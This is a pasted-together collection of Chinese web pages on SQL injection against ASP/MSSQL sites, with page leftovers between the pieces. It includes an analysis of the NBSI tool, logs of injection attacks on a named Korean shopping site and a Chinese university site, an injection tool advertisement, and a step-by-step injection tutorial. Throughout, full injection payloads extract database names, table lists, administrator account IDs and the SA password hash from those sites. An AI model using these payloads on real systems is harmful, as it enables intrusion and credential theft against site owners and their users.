& & & & & & & & & NBSI 注入分析跟踪报告(MSSQL篇)
=======================================================================================
作者:Softbug 文章来源:情感网络&
编写一个好的工具不容易,编写一个注入工具更是不容易。这篇文章系统通过跟踪NBSI的注入过程来分析牛人的测试思路。对手工分析刺探很有帮助。仔细跟踪NBSI的刺探结果也是对注入攻击的一种欣赏。&
首先我们找到了一家IT站点做测试,测试的目录仅仅是为了跟踪NBSI的刺探思路,不曾对该网站进行过恶意的破坏!&
1 & & & & 注入点的探测&
假设注入点为:/zhuru.asp?id=1&
那么NBSI会首先试探这样的连接:/zhuru.asp?id=1 and user%2bchar(124)&0&
最开始不明白为什么要叫个Char(124),这个值其实是个&|&符号。后面我们会说到。&
当然了,这样IIS会报错,返回一个500的内部错误号码,也许作者就以此为根据吧。&
3 & & & & 猜解表名&
跟踪发现,作者用一句话就完成一个表名的猜解,效率的确很高。具体的表名猜测代码为:&
And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)&0&
看见红色的1了吗?这个就是猜测数据表的表名数值!如果是第一个表,当然就为1,如果是第一个表那么这个1就改为2就是了,以此类推。&
那么我们如何决定表名已经猜测完毕了呢?这个简单,跟踪发现,只要 表名数值 X 和 X+1 个表返回的表名值是一样的表示猜测完毕了。&
5 & & & & 猜测列名&
跟踪发现,作者也是用一句话就完成了一个表名的猜解。可能这个就是对MSSQL猜解的好处吧!换了Access可能也是要一个字母一个字母的去猜。具体的猜解列名的代码为:&
And (Select Top 1 cast(name as varchar(8000)) from (Select Top 1 colid,name From syscolumns Where id = OBJECT_ID(NCHAR(78)%2BNCHAR(101)%2BNCHAR(119)%2BNCHAR(115)%2BNCHAR(95)%2BNCHAR(85)%2BNCHAR(115)%2BNCHAR(101)%2BNCHAR(114)) Order by colid) T Order by colid desc)&0&
看到红色的1了吗?这个表示我们要猜测列名的序列值。换成2就表示要猜测第2个列名。判断结束的方式和判断表名结束的方式一样。&
注意一点:&
NCHAR(78)%2BNCHAR(101)%2BNCHAR(119)%2BNCHAR(115)%2BNCHAR(95)%2BNCHAR(85)%2BNCHAR(115)%2BNCHAR(101)%2BNCHAR(114)&
为了饶过 & 符号的限制,作者尽量使用Nchar来连接表名的字符串值。上面这一传实际上就代表了一个表的字符串值。括号里面的数字是字符的ASC码。&
如果我们要猜测xfiletd这个表名,我们只要用HUIE的插件换算一下就OK了!&
我们就得到了下面字符:&
nchar(78)%2bnchar(66)%2bnchar(69)%2bnchar(6C)%2bnchar(65)%2bnchar(74)%2bnchar(75)&
呵呵!速度快吧!&
6 & & & &猜解数据&
下面我们来看看NBSI是如何猜解数据的,按道理应该是&暴&,让我们期待一下牛人是如何暴数据的。&
1) 得到字段的记录个数&
And%20(Select%20Cast(Count(1)%20as%20varchar(8000))%2Bchar(97)%20From%20[News_Style]%20Where%201=1)&0&
其中红色的News_Style代表我们要猜解的表名,这里作者用到了一个常用的暴表技巧。我们得到了字段数以后,字段是个INT类型的值,他和0比较是不会发生类型转换错误的。换句话说,记录就不会自动的&招&。如果我们在和0比较的时候实现就把把它和Char(97)//字符a 相连接,那么我们得到的就会是个字符串了。和零比较的时候自然就暴出了&记录个数&+a &这样一个数值来。现在大家该明白为什么第一步的刺探要加一个&|&符号了吧!谜底解开了。&
2) 得到字段的值&
得到了记录个数,然后不断的循环而暴出字段的值。还好,作者没用什么奇特的招数。作者的代码为:&
And (Select Top 1 isNull(cast([sName] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 9 sName From [News_Style] Where 1=1 Order by sName) T Order by sName desc)&0&
红色的news_style我不多解释了,就是要猜解的数据表名,绿色的9表示要得到第就 sname字段的第9条记录的值。循环几次,呵呵!数据就到手了。&
大家注意一下:char(124)这个东西。它的目的也在于把数据统统转化为字符串类型然后和int类型进行比较,然后暴出数据。道理如前所述!这就是NBSI为什么在得到的字段里面有&|&这样的值的原因。作者也许懒得处理罢了。:-)&
看到了吗?后面都有&|&符号。&
3) &关于双数据和N个数据的猜测&
大家也许觉得,NBSI猜测数据字段的值的速度很快,跟踪分析了一下,的确不错。假设我们要猜测一个表的2个字段的值。那么我们该如何写代码呢?&
&NBSI的代码是这样写的:&
第一步还是用1)的办法得到记录个数。第二步就用:&
And (Select Top 1 isNull(cast([UserName] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([PassWord] as varchar(8000)),char(32)) From (Select Top 1 UserName,PassWord From [News_User] Where 1=1 Order by UserName,PassWord) T Order by UserName desc,PassWord desc)&0&
(注意看|符号隔开了2个数值)&
News_user是一个表名,Char(124)我就不多解释了。大家可以照着猫画虎,把上面的语句和2)里面的语句进行对比一下。具有基本地球人功能的我想都能看出来作者是怎么暴多字段值的了吧。如果你高兴,一次把数据库的值都暴出来都无所谓。这里间接的提醒一下大家:暴一个字段的值的网络开销和暴全部的值的网络开销差不了多少,下次玩NBSI的时候记得把所有的值都挂上吧!J&
总结:有希望完成自己VB代码的朋友可能根据我们分析的结果编写程序,你们也将拥有属于自己的NBSI。如今的HUIE就具有这样的功能。希望大家去www.hack0.net访问。&
写程序最重要的就是编程思路,也许你看到的只是编写一个好程序的部分细节罢了。大家有没意思到,NBSI是如何判断网站能否注入的呢?其实单靠SQL暴错只是一个思路罢了。NBSI给我们展现的两种思路是:&
2 & & & & 判断IIS的报头 以正常返回200,101 为基础,如果返回500则表示出现了错误。&
3 & & & & 逐字逐句的判断IIS的返回信息,然后自己对比是否有注入的可能性!(因为,有些网站返回的HTML信息量是非常大的!用程序判断仍然很费时间,不推荐)&
更多的东西,其实我们还需要学习。不光是暴库,搞注入。&
NBSI其实是一个项目很大的软件,我们的分析是完全建立在IIS的错误提示开启的状态下完成的。 & & 而且是使用的&数字型&的注入方式。局限是有点,我们会继续跟踪以完全挖掘NBSI的注入思路的。Access注入的判断也许就是一个难恼人的编程项目。换了是你,你能编写出来吗?NBSI还有很多地方不健全,看了我们的文章也许你有办法可以编写出更牛的NB出来。有兴趣的朋友可以继续关注我们的NBSI分析报告。更欢迎有志之人能把编写出自己的网络小插件发到www.hack0.net来!&
Ps: 关于HUIE和HUIE插件的介绍请大家到www.hack0.net查询。更详细的讨论可以到www.hackerxfiles.net的[URL=]论坛[/URL]来发言。&
细想这INternet发展的速度真的是很快,稍微不注意就跟不上安全的节奏.对网管来说(其实很多接触安全的人都是网管),一个,一个小小的漏洞对网管来说都可能造成严重的后果.
搜索型注入语句[二]
& 帖几个baidu出来的关于搜索型注入的文章。百度货,不知道作者是哪个,感谢了先。。 ^_^
简单的判断搜索型存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞。然后搜索%,如果正常返回,说明95%有洞了。
然后再搜索一个关键字,比如2006吧,正常返回所有2006相关的信息,再搜索2006%'and 1=1 and '%'='和2006%'and 1=2 and '%'=',存在异同的话,就是100%有洞了。
我这里看出有上面说的洞后开始用nbsi来扫,结果总是超时,郁闷,看来要手工来暴需要的信息了。。。
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and user&0 and '%'=' //得到当前数据库账号
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and db_name()&0 and '%'=' //得到当前数据库名
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select count(*) from admin)&0 and '%'=' //返回错误页面,看来是没有admin这个表了
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status&0)&0 and '%'=' //得到当前数据库的第一个表名
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status&0 and name not in('codechange'))&0 and '%'=' //得到当前数据库的第二个表名
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status&0 and name not in('codechange','oldpoint'))&0 and '%'=' //得到当前数据库的第三个表名
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and%20(select%20top%201%20name%20from%20lvhuana3.dbo.sysobjects%20where%20xtype='u'%20and%20status&0%20and%20name%20not%20in('codechange','oldpoint','tbl_admin','tbl_afterservice','tbl_agent','tbl_bank','tbl_board','tbl_board2','tbl_brandbestLeft','tbl_brandbestRight','tbl_card','tbl_cart','tbl_catalogue','tbl_community','tbl_court','tbl_estimate','tbl_FAQ','tbl_mail_list','tbl_mem_add','tbl_mem_main','tbl_mem_out','tbl_mem_rboard','tbl_mileage','tbl_notice','tbl_ord_cash_receipt','tbl_ord_change''tbl_ord_cs','tbl_ord_change','tbl_ord_cs','tbl_ord_main','tbl_ord_payment','tbl_ord_prd','tbl_ord_prd_return','tbl_ord_refund','tbl_ord_req_main','tbl_ord_req_prd','tbl_ord_request','tbl_ord_user','tbl_partition','tbl_prd_category','tbl_prd_click','tbl_prd_desc','tbl_prd_grade','tbl_prd_main','tbl_prd_model','tbl_recommand','tbl_saleshop','tbl_search','tbl_tax','tbl_zipcode','tempDesc','tempdesc2','tempmodel','tempPrdMain','tempPrdmodel','tempsize','tempstyle','tmpordprd','tmpordprd2','trace1'))&0%20and%20'%'=' //依次类推,得到所有的表
其实分析可以知道只有这个tbl_admin表才是最重要的。接着开始暴列名。
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),1) from tbl_admin)&0 and '%'=' //得到tbl_admin这个表里的第一个列名c_employee_id
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),2) from tbl_admin)&0 and '%'=' //得到tbl_admin这个表里的第二个列名c_employee_name
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)&0 and '%'=' //得到tbl_admin这个表里的第三个列名c_password
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)&0 and '%'=' //得到tbl_admin这个表里的第四个列名c_level
列名暴完毕了,嘿嘿,接着开始暴管理员账号密码了。
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 c_employee_id from tbl_admin)&0 and '%'=' //得到第一个管理员的id为943hoon
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 2 * from tbl_admin order by 1)T order by 1 desc)S)&0 and '%'=' //得到第二个管理员的id为champ
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 3 * from tbl_admin order by 1)T order by 1 desc)S)&0 and '%'=' //得到第三个管理员的id为clark
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)&0 and '%'=' //得到第四个管理员的id为hskim
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)&0 and '%'=' //得到第五个管理员的id为jajeong
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 c_c_password from tbl_admin)&0 and '%'=' //这个语句是暴出管理员密码的,可惜直接返回了正常页面,郁闷。。。。
一会再想别的办法吧。。。。。
另外说下,2.3 的啊D支持搜索型的注入方式是:
一般网站的搜索都是部分匹配的
有漏洞的url是.cn/n ...ST=title&SC=
构造注入语句 三星%'and 1=1 and '%'='
三星%'and 1=2 and '%'='
大家看到了吧 两个返回页面是不一样的 说明有注入的漏洞 特征字 写笔记本 就是三星%'and 1=1 and '%'=' 返回时有的
我们知道一般搜索代码是这么写的:
Select * from 表名 where 字段 like &%关键字%&
这样就造成了对关键字前后的所有匹配(%是用来全部匹配的)
这里如果关键字没有过滤的话,就可以这样来构造:
关键字=& and [查询条件] and &%25&=&
这样查询就变成
select * from 表名 where 字段 like '%' and 1=1 and '%'='%'
这样就很好的构成了一个点,当然用手工也可以,用nbsi也可以~~
注入是不分家的,没必要什么型什么型的!~
如果不信,大家请看下面的《天书》的原话
第一节、SQL注入的一般步骤
首先,判断环境,寻找注入点,判断数据库类型,这在入门篇已经讲过了。
其次,根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种:
(A) ID=49 这类注入的参数是数字型,SQL语句原貌大致如下:
Select * from 表名 where 字段=49
注入的参数为ID=49 And [查询条件],即是生成语句:
Select * from 表名 where 字段=49 And [查询条件]
(B) Class=连续剧这类注入的参数是字符型,SQL语句原貌大致概如下:
Select * from 表名 where 字段=&连续剧&
注入的参数为Class=连续剧& and [查询条件] and &&=& ,即是生成语句:
Select * from 表名 where 字段=&连续剧& and [查询条件] and &&=&&
(C) 搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:
Select * from 表名 where 字段like &%关键字%&
注入的参数为keyword=& and [查询条件] and &%25&=&,即是生成语句:
Select * from 表名 where字段like &%& and [查询条件] and &%&=&%&
当然手工是麻烦的
用工具的话,我建议用nbsi的工具比较好,就我感觉只有nbsi结合了这个技术,用别的软体是不能注入的
注入点只要写:
.cn/n ...ST=title&SC=%
再加个特征字符就可以了&
您对本文章有什么意见或着疑问吗?请到您的关注和建议是我们前行的参考和动力&&}
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
SQL注入网站入侵攻击实例
上传于||暂无简介
阅读已结束,如果下载本文需要使用2下载券
想免费下载本文?
你可能喜欢不知道网站是否被SQL注入?该如何防范?跪求高手相助
[问题点数:100分]
不知道网站是否被SQL注入?该如何防范?跪求高手相助
[问题点数:100分]
不显示删除回复
显示所有回复
显示星级回复
显示得分回复
只显示楼主
2010年2月 Web 开发大版内专家分月排行榜第二
2010年3月 Web 开发大版内专家分月排行榜第三
2013年10月 Web 开发大版内专家分月排行榜第三
本帖子已过去太久远了,不再提供回复功能。国产SQL注入漏洞测试工具 – 超级SQL注入工具(SSQLInjection) -
| 关注黑客与极客
国产SQL注入漏洞测试工具 – 超级SQL注入工具(SSQLInjection)
共343370人围观
,发现 88 个不明物体
此工具为本人对C#、Socket及HTTP协议、SQL注入进行深入研究后,闲暇时间做的一款SQL注入工具。不说秒SQLMap,直接秒杀什么webcruiser、Safe3SI、pangolin、havij、DSQLTools、明小子等,今后可以扔掉这些过时的工具了。
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。
目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。
采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,相比C#自带的HttpWebRequest速度提升2-5倍。
支持盲注环境获取世界各国语言数据,直接秒杀各种注入工具在盲注环境下无法支持中文等多字节编码的数据。
1.支持任意地点出现的任意SQL注入
2.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。
3.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。
4.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。
程序运行需要安装. Net Framework 2.0。运行环境XP、Win7,Win8环境已测试,其他环境请自测。
1篇文章等级:1级
这家伙太懒,还未填写个人描述!
楼主博客所说“史上最牛”,我就不乐意了!我可是94P7大牛,信不信等会抽根烟时间就能写一个秒杀你的seay史上全宇宙最屌注入工具,支持本地txt文本注入
请不要在炫耀自己的同时侮辱别人!没有前人的经验你能写出来? 最讨厌这种把自己的优越感建立在贬低别人的基础上的人
你们都太young我比较关心这篇文章能拿到200元稿费吗?
学习的小白
看完文章感觉很牛逼,试了一下感觉很呵呵:功能方面:“类别识别”这是这类工具最基本的功能,如果这个不做,就不要说是SQL注入工具了。界面方面:1.“导出配置”点“取消”竟然是“导出完毕”;2.程序运行起来,那个日志Textbox哗哗的跑,然后程序整个form就死了。
这年头 还在自己的软件里加QQ加网址 想想就知道是不是好程序了 我也是醉了
必须您当前尚未登录。
必须(保密)
这家伙太懒,还未填写个人描述!
分享每日精选文章& & & & 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL&Injection,即SQL注入。& & SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。& & 但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据,是高手与&菜鸟&的根本区别。& & 根据国情,国内的网站用ASP+Access或SQLServer的占70%以上,PHP+MySQ占L20%,其他的不足10%。在本文,我们从分入门、进阶至高级讲解一下ASP注入的方法及技巧,PHP注入的文章由NB联盟的另一位朋友zwell撰写,希望对安全工作者和程序员都有用处。了解&ASP注入的朋友也请不要跳过入门篇,因为部分人对注入的基本判断方法还存在误区。大家准备好了吗?Let's&Go...& & 入门篇& & 如果你以前没试过SQL注入的话,那么第一步先把IE菜单=>工具=>Internet选项=>高级=>显示友好&HTTP&错误信息前面的勾去掉。否则,不论服务器返回什么错误,IE都只显示为HTTP&500服务器错误,不能获得更多的提示信息。& & 注入工具介绍:& & 啊D,明小子,wed+wis,冰舞等。& & 这些工具常用的是明小子和啊D,对网站进行扫描注入漏洞,要下载最新的工具。& & 对于工具的使用,一定要熟悉!!。。& & 第一节、SQL注入原理& & 以下我们从一个网站开始(注:本文发表前已征得该站站长同意,大部分都是真实数据)。& & 在网站首页上,有名为&IE不能打开新窗口的多种解决方法&的链接,地址为:/showdetail.asp?id=49,我们在这个地址后面加上单引号&,服务器会返回下面的错误提示:& & Microsoft&JET&Database&Engine&错误&'80040e14'& & 字符串的语法错误&在查询表达式&'ID=49''&中。& & /showdetail.asp,行8& & 从这个错误提示我们能看出下面几点:& & 1.&网站使用的是Access数据库,通过JET引擎连接数据库,而不是通过ODBC。(注:熟悉网站的开发和哪些网站通常使用什么样的数据库。不同的网站连接数据库的方式也要了解。对数据库的知识也要有一定的理解)& & 2.&程序没有判断客户端提交的数据是否符合程序要求。& & 3.&该SQL语句所查询的表中有一名为ID的字段。& & 从上面的例子我们可以知道,SQL注入的原理,就是从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取你想到得到的资料。& & 第二节、判断能否进行SQL注入& & 看完第一节,有一些人会觉得:我也是经常这样测试能否注入的,这不是很简单吗?& & 其实,这并不是最好的方法,为什么呢?& & 首先,不一定每台服务器的IIS都返回具体错误提示给客户端,如果程序中加了cint(参数)之类语句的话,SQL注入是不会成功的,但服务器同样会报错,具体提示信息为处理&URL&时服务器上出错。请和系统管理员联络。& & 其次,部分对SQL注入有一点了解的程序员,认为只要把单引号过滤掉就安全了,这种情况不为少数,如果你用单引号测试,是测不到注入点的& & 那么,什么样的测试方法才是比较准确呢?答案如下:& & ①&/showdetail.asp?id=49& & ②&/showdetail.asp?id=49&;and&1=1& & ③&/showdetail.asp?id=49&;and&1=2& & 这就是经典的1=1、1=2测试法了,怎么判断呢?看看上面三个网址返回的结果就知道了:& & 可以注入的表现:& & ①&正常显示(这是必然的,不然就是程序有错误了)& & ②&正常显示,内容基本与①相同& & ③&提示BOF或EOF(程序没做任何判断时)、或提示找不到记录(判断了rs.eof时)、或显示内容为空(程序加了on&error&resume&next)& & 不可以注入就比较容易判断了,①同样正常显示,②和③一般都会有程序定义的错误提示,或提示类型转换时出错。& & 当然,这只是传入参数是数字型的时候用的判断方法,实际应用的时候会有字符型和搜索型参数,我将在中级篇的&SQL注入一般步骤&再做分析。& & 第三节、判断数据库类型及注入方法& & 不同的数据库的函数、注入方法都是有差异的,所以在注入之前,我们还要判断一下数据库的类型。一般ASP最常搭配的数据库是Access和SQLServer,网上超过99%的网站都是其中之一。& & 怎么让程序告诉你它使用的什么数据库呢?来看看:& & SQLServer有一些系统变量,如果服务器IIS提示没关闭,并且SQLServer返回错误提示的话,那可以直接从出错信息获取,方法如下:& & /showdetail.asp?id=49;and&user>0& & 这句语句很简单,但却包含了SQLServer特有注入方法的精髓,我自己也是在一次无意的测试中发现这种效率极高的猜解方法。让我看来看看它的含义:首先,前面的语句是正常的,重点在and&user>0,我们知道,user是SQLServer的一个内置变量,它的值是当前连接的用户名,类型为nvarchar。拿一个&nvarchar的值跟int的数0比较,系统会先试图将nvarchar的值转成int型,当然,转的过程中肯定会出错,SQLServer的出错提示是:将nvarchar值&&abc&&转换数据类型为&int&的列时发生语法错误,呵呵,abc正是变量user的值,这样,不废吹灰之力就拿到了数据库的用户名。在以后的篇幅里,大家会看到很多用这种方法的语句。& & 顺便说几句,众所周知,SQLServer的用户sa是个等同Adminstrators权限的角色,拿到了sa权限,几乎肯定可以拿到主机的&Administrator了。上面的方法可以很方便的测试出是否是用sa登录,要注意的是:如果是sa登录,提示是将&dbo&转换成int的列发生错误,而不是&sa&。& & 如果服务器IIS不允许返回错误提示,那怎么判断数据库类型呢?我们可以从Access和SQLServer和区别入手,Access和&SQLServer都有自己的系统表,比如存放数据库中所有对象的表,Access是在系统表[msysobjects]中,但在Web环境下读该表会提示&没有权限&,SQLServer是在表[sysobjects]中,在Web环境下可正常读取。& & 在确认可以注入的情况下,使用下面的语句:& & /showdetail.asp?id=49;and&(select&count(*)&from&sysobjects)>0& & /showdetail.asp?id=49;and&(select&count(*)&from&msysobjects)>0& & 如果数据库是SQLServer,那么第一个网址的页面与原页面/showdetail.asp?id=&49是大致相同的;而第二个网址,由于找不到表msysobjects,会提示出错,就算程序有容错处理,页面也与原页面完全不同。& & 如果数据库用的是Access,那么情况就有所不同,第一个网址的页面与原页面完全不同;第二个网址,则视乎数据库设置是否允许读该系统表,一般来说是不允许的,所以与原网址也是完全不同。大多数情况下,用第一个网址就可以得知系统所用的数据库类型,第二个网址只作为开启IIS错误提示时的验证。& & 进阶篇& & 在入门篇,我们学会了SQL注入的判断方法,但真正要拿到网站的保密内容,是远远不够的。接下来,我们就继续学习如何从数据库中获取想要获得的内容,首先,我们先看看SQL注入的一般步骤:& & 第一节、SQL注入的一般步骤& & 首先,判断环境,寻找注入点,判断数据库类型,这在入门篇已经讲过了。& & 其次,根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种:& & (A)&ID=49&这类注入的参数是数字型,SQL语句原貌大致如下:& & Select&*&from&表名&where&字段=49& & 注入的参数为ID=49&And&[查询条件],即是生成语句:& & Select&*&from&表名&where&字段=49&And&[查询条件]& & (B)&Class=连续剧&这类注入的参数是字符型,SQL语句原貌大致概如下:& & Select&*&from&表名&where&字段=&连续剧&& & 注入的参数为Class=连续剧&&and&[查询条件]&and&&&=&&,即是生成语句:& & Select&*&from&表名&where&字段=&连续剧&&and&[查询条件]&and&&&=&&& & &&搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:& & Select&*&from&表名&where&字段like&&%关键字%&& & 注入的参数为keyword=&&and&[查询条件]&and&&%25&=&,&即是生成语句:& & Select&*&from&表名&where字段like&&%&&and&[查询条件]&and&&%&=&%&& & 接着,将查询条件替换成SQL语句,猜解表名,例如:& & ID=49&And&(Select&Count(*)&from&Admin)>=0& & 如果页面就与ID=49的相同,说明附加条件成立,即表Admin存在,反之,即不存在(请牢记这种方法)。如此循环,直至猜到表名为止。& & 表名猜出来后,将Count(*)替换成Count(字段名),用同样的原理猜解字段名。& & 有人会说:这里有一些偶然的成分,如果表名起得很复杂没规律的,那根本就没得玩下去了。说得很对,这世界根本就不存在100%成功的黑客技术,苍蝇不叮无缝的蛋,无论多技术多高深的黑客,都是因为别人的程序写得不严密或使用者保密意识不够,才有得下手。& & ​
声明:该文章系网友上传分享,此内容仅代表网友个人经验或观点,不代表本网站立场和观点;若未进行原创声明,则表明该文章系转载自互联网;若该文章内容涉嫌侵权,请及时向
上一篇:下一篇:
相关经验教程
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.001 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益
的原创经验被浏览,获得 ¥0.005 收益&>&&>& > 正文
搜索型注入
检验:&江西农大招生就业网&
关键字%' and 1=1 and '%'=' &返回正常
关键字%' and 1=2 and '%'=' &返回错误
%25%25%25%27%09and%091=1%23 & %09代替空格法
2找出keyword
post方式得抓抱:(变量放在最后面,就可以直接放工具跑)
http://zhaojiu./Web_News/Search.asp?style=3&keyWord=江西
冬%' order by 1-- and '%'=' &或: & 冬%' order by 1 and '%'='
& &爆当前数据库用户名:
& /Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7%20and%20user=0-- &&
& /Web_News/Search.asp?style=3&keyWord=江西'and%20user=0 & %BD%AD%CE%F7=江西的url编码
& & & & & & & & & & & & &-- ----- 字符型注意有个 ' 号 & 下面同理-----
& 魔术引号开关magic_quotes_gpc
& & &这个用pangolin基本上都可以猜出来,其实我们完全可以在注入点后加 &and '1'='1'/* &返回正常表明GPC关,否则表明GPC开
& 原理分析: 当GPC开启时,会对' 进行转义,使其变成 \'
& 爆当前数据库版本:
& /Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20@@VERSION)%3E0--
& &爆当前数据库名:
& /Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20db_name()%3E0--
& 本地服务名:
& /Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20@@servername%3E0-- &pangolin工具得出:JXAU-H1LI7JSV2I
& *****网页返回:[Microsoft][ODBC SQL Server Driver][SQL Server]在将 nvarchar 值 'JXAU-H1LI7JSV2I' 转换成数据类型 int 时失败。
& 服务器名:
& /Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20host_name()=0--&
&数据库系统用户名:(sa)
&/Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20system_user%3E0--&
&在将 nvarchar 值 'sa' 转换成数据类型 int 时失败
---------------------------------------------------------------------
&判断权限:
&SA权限: &/Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20cast(is_srvrolemember(0xas%20nvarchar(1))%2bchar(124)=1%20and%20'1'='1
&DBO权限: /Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20cast(is_member(0x6fas%20nvarchar(1))%2bchar(124)=1%20and%20'1'='1
-------------------------------------------------------------
爆数据库名:
& 第一个:/Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast([name]%20as%20nvarchar(500))%2bchar(94)%20from%20[master].[dbo].[sysdatabases]%20where%20[dbid]%20in%20(select%20top%201%20[dbid]%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid]%20desc))%3E0--
& 第二个:/Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast([name]%20as%20nvarchar(500))%2bchar(94)%20from%20[master].[dbo].[sysdatabases]%20where%20[dbid]%20in%20(select%20top%202%20[dbid]%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid]%20desc))%3E0--
& & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & ------------ 第二个数据库 & & & ----------- & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & & &&
爆SA的hash值:
& /Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bisnull(master.dbo.fn_varbintohexstr([password_hash]),char(32))%20from(select%20top%20%201%20[name],[password_hash]%20from%20[master].[sys].[sql_logins]%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)--&
猜表的数量:
/Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20cast(count(1)%20as%20varchar(10))%2bchar(94)%20from%20[zhaojiuchu].[sys].[all_objects]%20where%20type=char(85))%3E0-- & &type=char(85)=type=U
爆第一个表名:
& &/Web_News/Search.asp?style=3&keyWord=%BD%AD%CE%F7'%20and%20(select%20top%201%20cast(name%20as%20varchar(500))%20from(select%20top%201%20object_id,name%20from%20[zhaojiuchu].[sys].[all_objects]%20where%20type=char(85)%20order%20by%20object_id)%20t%20order%20by%20object_id%20desc)%3E0--
爆第二个表名:&
